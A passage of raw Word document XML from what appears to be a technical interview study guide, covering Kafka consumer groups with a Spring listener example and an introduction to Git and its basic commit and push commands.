          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message is the same</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered to each group independently</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2DF7A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is is because Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maintains a separate offset for each group ID</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6483BC47"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6F627067">
          <v:rect id="_x0000_i3592" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDAE97A"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Code Example: Kafka Listener Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653BC68F"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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413D429A"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kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6630E1F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consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C58A5C7"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group-id: ${spring.application.name}-group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDCAB37"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bootstrap-servers: localhost:9092</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA15AC8"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auto-offset-reset: earliest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C24A9F5"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Listener Code (Common for All Microservices):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55990D38"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KafkaListener(topics = "cache-refresh-topic", groupId = "${spring.kafka.consumer.group-id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D08DD"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public void listen(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0269F93B"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    System.out.println("Received message: " + message + " in service: " + serviceName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368AF220"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77771E" w14:textId="77777777" w:rsidR="006219D6" w:rsidRPr="006219D6" w:rsidRDefault="00000000" w:rsidP="006219D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2E7F03E6">
          <v:rect id="_x0000_i3593" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01217AF1" w14:textId="77777777" w:rsidR="006219D6" w:rsidRPr="006219D6" w:rsidRDefault="006219D6" w:rsidP="006219D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C761623"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Yes, if the </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>group IDs are different</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, all 5 microservices </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can consume the same message</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593C2B75"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Kafka treats each consumer group as a </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate subscription</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C1EB6" w14:textId="77777777" w:rsidR="006219D6" w:rsidRPr="006219D6" w:rsidRDefault="006219D6" w:rsidP="006219D6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This pattern is useful when </w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all microservices need to act on the same event</w:t>
      </w:r>
      <w:r w:rsidRPr="006219D6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., refreshing cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CDE176" w14:textId="77777777" w:rsidR="00F77084" w:rsidRDefault="00000000" w:rsidP="00F77084">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A5A9BC">
          <v:rect id="_x0000_i3594" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39444F5E" w14:textId="77777777" w:rsidR="00F77084" w:rsidRPr="004E09A2" w:rsidRDefault="00F77084" w:rsidP="00522F3E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502E8FF9" w14:textId="77777777" w:rsidR="00522F3E" w:rsidRPr="004E09A2" w:rsidRDefault="00522F3E" w:rsidP="004E09A2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676F7288" w14:textId="77777777" w:rsidR="001D52C0" w:rsidRPr="008D3EB8" w:rsidRDefault="001D52C0" w:rsidP="008D3EB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104A2C31" w14:textId="71A70FAF" w:rsidR="002D75F3" w:rsidRPr="00D87893" w:rsidRDefault="002D75F3" w:rsidP="00D87893">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D87893">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746444F" w14:textId="797B7526" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="00D70F52" w:rsidP="00AE4D37">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="886" w:name="_Toc197868100"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GitHub</w:t>
      </w:r>
      <w:bookmarkEnd w:id="886"/>
    </w:p>
    <w:p w14:paraId="7330F874"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87" w:name="_Toc197868101"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Version control i.e. Git?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="887"/>
    </w:p>
    <w:p w14:paraId="15EF722A" w14:textId="66F6A39A" w:rsidR="00CA2729" w:rsidRPr="00AE4D37" w:rsidRDefault="00CA2729" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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 xml:space="preserve">Here’s a breakdown of </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and its significance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5265B"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What is Git?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FD56D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 xml:space="preserve">Git is a distributed version control system that allows you to track changes to files and coordinate work on those files among multiple people. It was created by </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linus Torvalds</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in 2005 for managing the Linux kernel's development. Git is fast, efficient, and widely used in the software development industry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF836A9"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Key Features of Git:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355EE14"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Tracking Changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git keeps track of every change made to files in the repository, along with information about who made the change and when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529B4969"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Distributed</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Every contributor gets a full copy of the repository, including its history. This allows them to work offline and push changes when they are online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C1A50"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ranching and Merging</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git allows for branching (creating separate lines of development) and merging (combining them). This helps developers experiment with new features without affecting the main codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6A2862"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mmit History</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git stores a history of all the commits made to the repository. You can always check the history and revert to a previous state if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C0FB8"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on</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git allows multiple developers to work on the same project simultaneously. It efficiently manages changes, even when multiple people modify the same file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F13D0B3"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Basic Git Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A281D"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init</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initializes a new Git repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0021A626"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 xml:space="preserve">git clone </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Clones an existing repository to your local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EFA977"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 xml:space="preserve">git add </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stages changes (prepares them to be committed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764513C5"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commit -m "message"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Commits the changes with a descriptive message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314571D"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push</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Pushes local commits to a remote repository (e.g., GitHub, GitLab).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5ED8C3"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pull</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fetches and merges changes from a remote repository into your local repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE99E4"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branch</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lists, creates, or deletes branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70528CA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git merge</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Merges changes from one branch into another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E9DD4C"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Benefits of Using Version Control (Git):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDB7A2A"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on</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Developers can work together on the same codebase without overwriting each other’s changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA50A8"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History</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Every change made is recorded, allowing you to track who changed what and when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21252E1A"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ackup</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git keeps a complete history, and in case of issues, you can always revert to a previous state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6652AB"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Branching</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Developers can work on isolated branches for new features or bug fixes without affecting the main codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E3EF1"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de Review</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git helps in facilitating code reviews by providing the tools to compare changes, view history, and manage pull requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30416EB5" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00AE4D37" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use of Git in Projects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940D059"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Collaborative Development</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple developers can work on different parts of the project simultaneously and merge their changes easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2685C1D2"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Tracking Changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It provides a detailed history of code changes, which helps in debugging and understanding the evolution of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746966CF"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Managing Releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git helps in versioning software releases and tracking changes in each version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A0505" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00AE4D37" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE4D37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>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595" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20FD19"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88" w:name="_Toc197868102"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to push and commit code in git using commands?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="888"/>
    </w:p>
    <w:p w14:paraId="30C32F7D" w14:textId="17F28776"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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push</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commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code in Git, you follow a series of commands to make changes, stage them, commit them, and then push them to a remote repository. Here's the step-by-step process with Git commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01AC2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Steps to Commit and Push Code in Git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35EA33"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Check the Current Status of Your Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2166697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see the current status of your Git repository, use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7CF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status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C2A2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shows which files have been modified, which are staged for commit, and which are untracked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B94F7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Stage the Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A5E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fter modifying the files in your working directory, you need to stage them before committing. To stage specific files, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1174448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lt;file_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347692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stage a file called index.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9DC0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index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA645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f you want to stage </w:t>
      </w:r>
